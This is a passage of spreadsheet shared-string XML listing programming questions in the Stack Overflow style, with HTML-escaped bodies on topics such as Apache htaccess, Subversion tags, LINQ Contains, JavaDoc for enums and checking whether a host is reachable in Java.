    <t xml:space="preserve">&lt;p&gt;If I define a constant in a Perl module, how do I use that constant in my main program?  (Or how do I call that constant in the main program?)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>HOWTO: specify in app.config to call a function before Main() is called?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I really want to put in some sort of section handler into App.config that will execute some code before the application actually starts executing at Main.  Is there any way to do such a thing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I share a javascript object between different pages in Adobe AIR?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to have a custom object attached to the application so I can preserve state in it between different html pages in adobe air. Is this possible?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;I was asking for a fullblown solution to store a custom js object in memory and persist it between pages loaded from the application sandbox, but this cannot be done unless I use iframes which is not very pleasant, since I have to add a lot of stuff to the bridge. Anoter way may be to do partial rendering of the page filled with html read from files, but this exposes a lot of unpleasant bugs + you cant write script tags  in the dom dynamically. It's a crippled platform.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Apache htaccess on Win2k is not being processed</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to rewrite URLs using mod_rewrite.  It is enabled in httpd.conf and url rewriting works if the lines are in the httpd.conf file.  However, I would like the rules to be in the .htaccess file.
It doesn't appear that .htaccess is being processed at all by Apache on Win2k.&lt;/p&gt;
&lt;p&gt;I have ReWriteLogging turned all the way up, but the log file isn't being created.  The last line in httpd.conf is &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;AccessFileName .htaccess
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;.htaccess contents&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;RewriteEngine on
RewriteLog "c:/rewrite.log" 
RewriteLogLevel 15
RewriteRule /alice.html$ /bob.html
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks&lt;/p&gt;
&lt;p&gt;edit : Apache version 2.2 on Windows 2k &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Subversion &amp; switching between tags</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My automated deployment system updates a latest version of my site trough subversion. Instead of having my live site point to the trunk (which is always almost a work in progress version), I have my live site point to a tag.&lt;/p&gt;
&lt;p&gt;E.g. I work on trunk and when my v1.0 is finished I create a tag called 1.0 and do a checkout of that tag which is then my live site. Now, I keep working on trunk and after a while there is a v2.0. I create a tag called 2.0 and I want my live site to resemble this 2.0 tag.&lt;/p&gt;
&lt;p&gt;I could wipe the current live site and do a checkout of this 2.0 tag. Which sounds easy enough, however. My site is about 1GB is size because it has all kinds of PDF documents and video in it. I can safely say that most of the time I do updates it will be copy changes or bug fixes. This means that maybe only 1% of my site changes per update. And since my version control is only accessable to my webserver through on off site http connection it would mean that I need to download that whole site over and over again.&lt;/p&gt;
&lt;p&gt;Is there an easy way to switch between tags and have subversion only update the differences between those tags?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Good examples or documentation of XIFF implementation?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;a href="http://www.igniterealtime.org/projects/xiff/" rel="nofollow"&gt;XIFF&lt;/a&gt; is an implemenation of the &lt;a href="http://en.wikipedia.org/wiki/Jabber" rel="nofollow"&gt;XMPP&lt;/a&gt; protocol in actionscript.&lt;/p&gt;
&lt;p&gt;So far, all the examples and documentation I have seen are sparse. Does anyone know a good explanation of the most recent version of XIFF and/or good examples of working Flex/AIR applications? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Simplifying VisualSVN Server's URLs</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We're currently running an &lt;code&gt;svnserve&lt;/code&gt; instance as NT service. While this works, it's needlessly cumbersome to administer, and I'd like to move on to the much simpler VisualSVN Server. (Bonus side benefits include Windows-integrated authentication and, thanks to HTTP/WebDAV, browsing of the latest revision.)&lt;/p&gt;
&lt;p&gt;That said, the current server offers up URLs that look like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;svn://oldserver/path/to/some/file.foo
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Rather memorable.&lt;/p&gt;
&lt;p&gt;The new one, as set up through VSVNS:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;https://newserver:8443/svn/Repos/path/to/some/file.foo
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Ouch. For one, the &lt;code&gt;/svn&lt;/code&gt; bit is &lt;em&gt;entirely&lt;/em&gt; unnecessary. Since VSVNS runs its own HTTP server (that's why it's on the special port &lt;code&gt;8443&lt;/code&gt;, after all), &lt;em&gt;of course&lt;/em&gt; everything is related to &lt;code&gt;svn&lt;/code&gt;. Moreover, we only have one repository (and no real need for more), so the repository name in &lt;code&gt;/Repos&lt;/code&gt; shouldn't be there either â€”Â we could turn this off with &lt;code&gt;svnserve&lt;/code&gt;, so there should be a way to do it now, too.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Is it possible to configure VisualSVN Server to drop the &lt;code&gt;/svn&lt;/code&gt;? (Why is it there to begin with?)&lt;/li&gt;
&lt;li&gt;Given that there is only one repository, can I tell it not to make the repository name part of the URL?&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>What will the pNext pointer be in the following case using C?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;func()
{
    Object* pNext;
    func1(pNext);
}
func1(Object* pNext)
{
    pNext = Segement-&amp;gt;GetFirstPara(0);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I was expecting it to be pointer to firstpara returned from func1() but I'm seeing NULL can some explain and how to fix it to actually return the firstpara() pointer?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Has anyone used/created "fisheye" table columns?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Has anyone ever given table columns the "fisheye" effect? Im talking about an expanding effect of the table columns when hovering the mouse over them. I'd love to see some code if anyone has tried this.&lt;/p&gt;
&lt;p&gt;EDIT: ...or an accordian effect&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Writing a compiler in its own language</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Intuitively, it would seems that a compiler for language Foo, cannot itself be written in Foo. More specifically, the &lt;em&gt;first&lt;/em&gt; compiler for language Foo cannot be written in Foo, but any subsequent compiler could be written for Foo.&lt;/p&gt;
&lt;p&gt;But is this actually true? I have some very vague recollection of reading about a language whose first compiler was written in "itself". Is this possible, and if so how?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best approach for using AJAX loaders?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've implemented a few poor solutions for bringing up an AJAX loader before dynamically updating a content DIV, but none seem to be "universal", and I find each time I do it I'm reworking it. If I have a DIV with content that updates depending on what a user clicks on the page, and I want to display the loader over this content DIV, what is the best approach? I've seen some developers have the loader always on the page, and they just display it block or none, and I've seen others append it to the DIV. What about when you also have multiple areas that can update? I'm thinking something repeatable that I can call with a function, maybe passing a few parameters.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>IIS 6 Tuning Guide?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been a developer for 10+ years and so far my IIS knowledge is just enough for deploying stuff on it and get it running. Recently I have been playing with IIS 6 and realize the huge difference on the worker process model. I think I would need some good guide to update my knowledge in this area. Any good article/book recommendation?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to find all the tables in MySQL with specific column names in them?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have 2-3 different column names that I want to look up in the entire DB and list out all tables which have those columns. Any easy script?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I upload files without using an HTML &lt;form&gt;?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;in a web application I am building I need to upload photos without using a form, otherwise it will come up with form embedded in an outer from which is not permitted in XHTML.&lt;/p&gt;
&lt;p&gt;I think uploading files is what jQuery.post should be able to do, but I currently can't figure out how to do this using jQuery.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Flexibility in the project scope?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How flexible should a programmer be if a client requests requirements that is not in the project scope?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Check if SoundChannel is playing sound</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How to check reliably if a SoundChannel is still playing a sound? &lt;/p&gt;
&lt;p&gt;For example,&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[Embed(source="song.mp3")]
var Song: Class;
var s: Song = new Song();
var ch: SoundChannel = s.play();
// how to check if ch is playing?
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do I properly store and retrieve internationalized Strings in properties files?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm experimenting with internationalization by making a Hello World program that uses properties files + ResourceBundle to get different strings.&lt;/p&gt;
&lt;p&gt;Specifically, I have a file "messages_en_US.properties" that stores "hello.world=Hello World!", which works fine of course.&lt;/p&gt;
&lt;p&gt;I then have a file "messages_ja_JP.properties" which I've tried all sorts of things with, but it always appears as some type of garbled string when printed to the console or in Swing. The problem is obviously with the reading of the content into a Java string, as a Java string in Japanese typed directly into the source can print fine.&lt;/p&gt;
&lt;p&gt;Things I've tried:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The .properties file in UTF-8 encoding with the Japanese string as-is for the value. Something I read indicates that Java expects a properties file to be in the native encoding of the system...? It didn't work either way.&lt;/li&gt;
&lt;li&gt;The file in default encoding (ISO-8859-1) and the value stored as escaped Unicode created by the native2ascii program included with Java. Tried with a source file in various Japanese encodings... SHIFT-JIS, EUC-JP, ISO-2022-JP.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I actually figured this out while I was typing this, but I figured I'd post it anyway and answer it in case it helps anyone.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>"suggest" feature for textboxes in a rails app</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for an easiest way how to implement the "suggest" feature for a text entry field in a Rails application. The idea is to complete names stored in a database column, giving the user a drop-down menu of possible matches as he types.&lt;/p&gt;
&lt;p&gt;Thanks for any suggestions!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to parse a .xfa file</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hoping that someone has some info on how to parse a xfa file. I can parse csv or xml files just fine, but an xfa one has come along and I'm not familar with the format. Looks like tab delimited body with column metadata at the top.&lt;/p&gt;
&lt;p&gt;Anyone dealt with these before or can give me a steer on how to parse them?&lt;/p&gt;
&lt;p&gt;I use vb.net but the language of any solution isn't too relevant.&lt;/p&gt;
&lt;p&gt;Much appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Creating standalone Lua executables</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there an easy way to create standalone .exe files from Lua scripts? Basically this would involve linking the Lua interpreter and the scripts.&lt;/p&gt;
&lt;p&gt;I believe it is possible (PLT Scheme allows the creation of standalone executables in the same way), but how, exactly?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2D Javascript array</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Simply put, is there a way to create a 2D javascript array using similar syntax to this?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var newArray = [
    [0, 1, 2],
    [3, 4, 5],
    [6, 7, 8]
]
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>HTML in an ASP.NET Dynamic Data MultilineText Control</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to enter a little bit of HTML into an ASP.NET Dynamic Data MultilineText_Edit control, just a couple of &lt;code&gt;&amp;lt;br&amp;gt;&lt;/code&gt; tags to have line breaks when I output the value of the column on a web page.  &lt;/p&gt;
&lt;p&gt;However, when I try to click the "Update" link on the Dynamic Data edit page, nothing happens.  I don't even get an error message, which I would expect if HTML input were not allowed via some rule the control has built in.  As soon as I remove the tag, the update link works correctly.  It's not a column size issue, I can add a bunch more characters to the input and everything works fine. &lt;/p&gt;
&lt;p&gt;Is HTML input not allowed in these controls, or is there something else going on?  If there is some kind of validation rule, can it be turned off?  Or is there something in the database that I need to set?  Should I use something other than the default multiline text template?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In agile like development, who should write test cases?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Our team has a task system where we post small incremental tasks assigned to each developer. &lt;/p&gt;
&lt;p&gt;Each task is developed in its own branch, and then each branch is tested before being merged to the trunk.&lt;/p&gt;
&lt;p&gt;My question is: Once the task is done, who should define the &lt;strong&gt;test cases&lt;/strong&gt; that should be done on this task? &lt;/p&gt;
&lt;p&gt;Ideally I think the developer of the task himself is best suited for the job, but I have had a lot of resistance from developers who think it's a waste of their time, or that they simply don't like doing it. &lt;/p&gt;
&lt;p&gt;The reason I don't like having my QA people do it, is because I don't like the idea of them creating their own work.  For example they might leave out things that are simply too much work to test, and they may not know the technical detail that is needed.  &lt;/p&gt;
&lt;p&gt;But likewise, the down part of developers doing the test cases, is that they may leave out things that they think will break. (even subconsciously maybe) &lt;/p&gt;
&lt;p&gt;As the project manager, I ended up writing the test cases for each task myself, but my time is taxed and I want to change this.&lt;/p&gt;
&lt;p&gt;Suggestions?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT: By test cases I mean the description of the individual QA tasks that should be done to the branch before it should be merged to the trunk. (Black Box)&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Show file tree in visual studio 2005?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a large project that I want to start using visual studio 2005 to edit. I want to tell it "Here are all the files I want you to track, now get on with it" and have them displayed as a directory tree, for example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Folder 1
 - File A
 - File B
 - File C
Folder 2
 - Folder 3
   - File X
   - File Y
 - File D
 - File E
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Right now it's just showing all the header files in one big list, and all the source files in one big list, which I find unhelpful. I also don't want to spend ages creating a folder in the project for each folder on the disk.&lt;/p&gt;
&lt;p&gt;Is there any way I can get VS to show me a source tree of everything in the solution, organised by where it is on the actual disk?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I use LINQ Contains(string[]) instead of Contains(string)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I got one big question.&lt;/p&gt;
&lt;p&gt;I got a linq query to put it simply looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;from xx in table
where xx.uid.ToString().Contains(string[])
select xx
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The values of the &lt;code&gt;string[]&lt;/code&gt; array would be numbers like (1,45,20,10,etc...)&lt;/p&gt;
&lt;p&gt;the Default for &lt;code&gt;.Contains&lt;/code&gt; is &lt;code&gt;.Contains(string)&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;I need it to do this instead:  &lt;code&gt;.Contains(string[])&lt;/code&gt;...&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT :&lt;/strong&gt; One user suggested writing an extension class for &lt;code&gt;string[]&lt;/code&gt;.  I would like to learn how, but any one willing to point me in the right direction?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT :&lt;/strong&gt; The uid would also be a number. That's why it is converted to a string.&lt;/p&gt;
&lt;p&gt;Help anyone?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I split multiple joined words?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an array of 1000 or so entries, with examples below:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;wickedweather
liquidweather
driveourtrucks
gocompact
slimprojector
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would like to be able to split these into their respective words, as:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;wicked weather
liquid weather
drive our trucks
go compact
slim projector
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I was hoping a regular expression my do the trick.  But, since there is no boundary to stop on, nor is there any sort of capitalization that I could possibly key on, I am thinking, that some sort of reference to a dictionary might be necessary?  &lt;/p&gt;
&lt;p&gt;I suppose it could be done by hand, but why - when it can be done with code! =)  But this has stumped me.  Any ideas?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to use JavaDoc to document a Java enum?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've just started using Java's enums in my own projects (I have to use JDK 1.4 at work) and I am confused as to the best practice of using JavaDoc for an enum.&lt;/p&gt;
&lt;p&gt;I have found that this method works, but the resultant code is a little unrefined:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/**
* Doc for enum
*/
public enum Something {
/**
* First thing
*/
FIRST_THING,
/**
* Second thing
*/
SECOND_THING;
//could continue with more
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there any way I could break up the enum declarations on their own lines without chaining them by commas, or is this the best approach for using JavaDoc for an enum?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the quickest way to detect an unreachable host in Java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like the fastest and most accurate function &lt;code&gt;boolean isReachable(String host, int port)&lt;/code&gt; that passes the following JUnit tests under the conditions below. Timeout values are specified by the JUnit test itself, and may be considered "unreachable."&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Please note:&lt;/strong&gt; All answers must be platform-independent. This means that &lt;code&gt;InetAddress.isReachable(int timeout)&lt;/code&gt; is not going to work, since it relies on port &lt;code&gt;7&lt;/code&gt; to do a ping on Windows (ICMP ping being an undocumented function on Windows), and this port is blocked in this setup.&lt;/p&gt;
&lt;p&gt;LAN Setup:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;thisMachine&lt;/code&gt; (&lt;code&gt;192.168.0.100&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;otherMachine&lt;/code&gt; (&lt;code&gt;192.168.0.200&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;no&lt;/strong&gt; machine is called &lt;code&gt;noMachine&lt;/code&gt; or has the IP &lt;code&gt;192.168.0.222&lt;/code&gt; (always unreachable)&lt;/li&gt;
&lt;li&gt;both machines are running Apache Tomcat on port &lt;code&gt;8080&lt;/code&gt;; all other ports are unreachable (including port &lt;code&gt;7&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;example.com&lt;/code&gt; (&lt;code&gt;208.77.188.166&lt;/code&gt;) is running a webserver on port &lt;code&gt;80&lt;/code&gt; and is only reachable when the LAN is connected to the Internet&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Occasionally, the LAN is disconnected from the Internet in which case only local machines called by IP address are reachable (all others are unreachable; there's no DNS).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;All tests are run on &lt;code&gt;thisMachine&lt;/code&gt;.&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@Test(timeout=1600) // ~320ms per call (should be possible to do better)
public void testLocalhost() {
    // We can always reach ourselves.
    assertTrue(isReachable("localhost", 8080));
    assertTrue(isReachable("127.0.0.1", 8080));
    assertTrue(isReachable("thisMachine", 8080)); // Even if there's no DNS!
    assertTrue(isReachable("192.168.0.100", 8080));
    assertFalse(isReachable("localhost", 80)); // Nothing on that port.
}
@Test(timeout=5500) // ~1867ms per call (should be able to do better)
public void testLAN() {
    assertTrue(isReachable("192.168.0.200", 8080)); // Always connected to the LAN.
    assertFalse(isReachable("192.168.0.222", 8080)); // No such a machine.
	assertFalse(isReachable("noMachine", 8080)); // No such machine.
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The following test is only run when the LAN is &lt;strong&gt;disconnected&lt;/strong&gt; from the Internet.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@Test(timeout=5600) // ~1867ms per call (reasonable?)
public void testNoDNS() {
    assertFalse(isReachable("otherMachine", 8080)); // No DNS.
    assertFalse(isReachable("example.com", 80)); // No DNS &amp;amp; no Internet.
    assertFalse(isReachable("208.77.188.166", 80)); // No Internet.
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The following test is only run when the LAN is &lt;strong&gt;connected&lt;/strong&gt; to the Internet.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@Test(timeout=5600) // ~1867ms per call (reasonable?)
public void testHaveDNS() {
    assertTrue(isReachable("otherMachine", 8080)); // DNS resolves local names.
    assertTrue(isReachable("example.com", 80)); // DNS available.
    assertTrue(isReachable("208.77.188.166", 80)); // Internet available.
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to raise an event from a SWF in a SWFLoader to a parent Flex application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I raise an event from a SWF file loaded into a Flex application (using SWFLoader)?&lt;/p&gt;
&lt;p&gt;I want to be able to detect&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;a) when a button is pressed
b) when the animation ends
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do I check if a tag exists in XSLT?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following template&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;h2&amp;gt;one&amp;lt;/h2&amp;gt;
&amp;lt;xsl:apply-templates select="one"/&amp;gt;
&amp;lt;h2&amp;gt;two&amp;lt;/h2&amp;gt;
&amp;lt;xsl:apply-templates select="two"/&amp;gt;
&amp;lt;h2&amp;gt;three&amp;lt;/h2&amp;gt;
&amp;lt;xsl:apply-templates select="three"/&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would like to only display the headers (one,two,three) if there is at least one member of the corresponding template. How do I check for this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Professional jQuery based Combobox control?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any &lt;strong&gt;professional&lt;/strong&gt; Combobox controls (dropdown list with autosuggestion) based on the jQuery library?&lt;/p&gt;
&lt;p&gt;It should be able to handle &lt;strong&gt;large datasets&lt;/strong&gt; and have some &lt;strong&gt;skinning&lt;/strong&gt; options. A &lt;strong&gt;multi-column result list&lt;/strong&gt; would be great too. I'm working with ASP.NET, but it's a not a problem if I had to write a wrapper for it.&lt;/p&gt;
&lt;p&gt;&lt;img src="http://i.stack.imgur.com/ilhvD.png" alt="alt text"&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;I'm already using a third-party control, but I ran into some compatibilty issues between two vendor's controls. Well, I want to get rid of this kind of dependencies.&lt;/em&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET, XSLT and dynamic controls</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I wish to use xml and xsl to generate controls on an asp.net page.&lt;/p&gt;
&lt;p&gt;I currently have a asp.net content page that contains a xml control. When the page is loaded, an xml file is loaded and the required element is extracted and set as the xml control's DocumentContent and the xml control's TransformSource is set to the appropriate xsl file.&lt;/p&gt;
&lt;p&gt;In the xsl file, I wish to use templates to create asp.net controls depending upon the contents of the xml. Is there an easy way of doing this with the xml control on the content page?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to log in an Oracle database?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am interested in what methods of logging is frequent in an Oracle database.
Our method is the following:&lt;/p&gt;
&lt;p&gt;We create a log table for the table to be logged. The log table contains all the columns of the original table plus some special fields including timestamp, modification type (insert, update, delete), modifier's id. A trigger on the original table creates one log row for each insertion and deletion, and two rows for a modification. Log rows contain the data before and after the alteration of the original one.&lt;/p&gt;
&lt;p&gt;Although state of the records can be mined back in time using this method, it has some drawbacks:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Introduction of a new column in the original table does not automatically involves log modification.&lt;/li&gt;
&lt;li&gt;Log modification affects log table and trigger and it is easy to mess up.&lt;/li&gt;
&lt;li&gt;State of a record at a specific past time cannot be determined in a straightforward way.&lt;/li&gt;
&lt;li&gt;...&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;What other possibilities exist?
What kind of tools can be used to solve this problem?&lt;/p&gt;
&lt;p&gt;I only know of &lt;a href="http://log4plsql.sourceforge.net/" rel="nofollow"&gt;log4plsql&lt;/a&gt;. What are the pros/cons of this tool?&lt;/p&gt;
&lt;p&gt;Edit: Based on Brian's answer I have found the following &lt;a href="http://www.oracle-base.com/articles/10g/Auditing_10gR2.php" rel="nofollow"&gt;reference&lt;/a&gt; that explains standard and fine grain auditing.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>TransactionScope bug in .NET? More information?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have read (or perhaps heard from a colleague) that in .NET, TransactionScope can hit its timeout and then VoteCommit (as opposed to VoteRollback).  Is this accurate or hearsay?  I couldn't track down information on the web that talked about this issue (if it IS an issue), so I wonder if anyone has any direct experience with it and can shed some light?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Do you use the 'My' namespace in VB.NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;VB.NET has the "my" namespace, but how many VB.NET developers actually use it?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;if you don't, why?     &lt;/li&gt;
&lt;li&gt;if you are using it, why?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I'm considering building a framework for VB.NET, and using the My namespace to plug it into VB seems like a reasonable idea. Is it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Unit testing a module that checks internet connectivity</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a C# module responsible for acquiring the list of network adapters that are "connected to the internet" on a windows Vista machine. The module uses the "&lt;a href="http://msdn.microsoft.com/en-us/library/aa370803(VS.85).aspx" rel="nofollow"&gt;Network List Manager API&lt;/a&gt;" (or NLM API) to iterate over all network connections and returns all those for which the IsConnectedToInternet value is true.&lt;/p&gt;
&lt;p&gt;I received some suggestions for the implementation of this module in this &lt;a href="http://stackoverflow.com/questions/38864/how-do-you-find-out-which-nic-is-connected-to-the-internet"&gt;SO question&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;To test this module I've decided to write a helper that returns the list of internet connected interfaces based on another logic, so it would be a sort of a "reality check" for the original module's logic. Note that for the test helper I am willing to use detection methods that might be considered bad practice for production code (e.g. relying on some internet resource like "Google" to be available - in case it shuts down, blocked by our internal firewall etc. it's relatively easy to fix the test as opposed to a deployed product base).&lt;/p&gt;
&lt;p&gt;The alternative detection method I chose was to try to connect to "www.google.com:80" with a TcpClient. My problem: When I have more than one connected adapter (e.g. both wireless and LAN) the detection method fails for one of them with the error "A connect request was made on an already-connected socket".&lt;/p&gt;
&lt;p&gt;My question is three fold:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;How would you go about testing such a module in general? Do you support the idea of doing the same thing in a different way and comparing the results or is it an overkill and I should rely on the system's API? My main problem here, is that it's very hard to pre-configure the system so that I'll know what the expected results are in advance.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;What alternative logic would you suggest? One thing that was suggested in the aforementioned question was looking at the routing table - what about considering each adapter that has a routing entry with a destination of 0.0.0.0 as "connected to the internet"? Other suggestions?&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Do you understand why I get the "already-connected" error with the current test logic?&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>History data from IE</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Where does Internet Explorer store the history data, i.e. the list of URL that have been visited? I am using Windows XP SP3 and IE7. Basically I would like to read the list of URL and make some statistics on how often what pages are visited.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is spaghetti code?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can you post a short example of real, overdone spaghetti code, possibly saying what it does? Can you show me a little debugger's nightmare?&lt;/p&gt;
&lt;p&gt;I don't mean &lt;a href="http://www0.us.ioccc.org/main.html" rel="nofollow"&gt;IOCCC&lt;/a&gt; code, that is science fiction. I mean real life examples that happened to you...&lt;/p&gt;
&lt;h3&gt;Update&lt;/h3&gt;
&lt;p&gt;The focus has changed from "post some spaghetti code" to "what is &lt;em&gt;exactly&lt;/em&gt; spaghetti code?". From a historical perspective, the current choices seem to be:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;old Fortran code using computed gotos massively&lt;/li&gt;
&lt;li&gt;old Cobol code using the ALTER statement&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>What is a SQL "pseudocolumn"?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I accidentally coded &lt;code&gt;SELECT $FOO..&lt;/code&gt; and got the error "Invalid pseudocolumn "$FOO".&lt;/p&gt;
&lt;p&gt;I can't find any documentation for them.   Is it something I should know?&lt;/p&gt;
&lt;p&gt;Edit: this is a MS SQL Server specific question.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Locating a file on the path</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anybody know how to determine the location of a file that's in one of the folders specified by the PATH environmental variable other than doing a dir filename.exe /s from the root folder?&lt;/p&gt;
&lt;p&gt;I know this is stretching the bounds of a programming question but this is useful for deployment-related issues, also I need to examine the dependencies of an executable. :-)&lt;/p&gt;
</t>
  </si>
  <si>
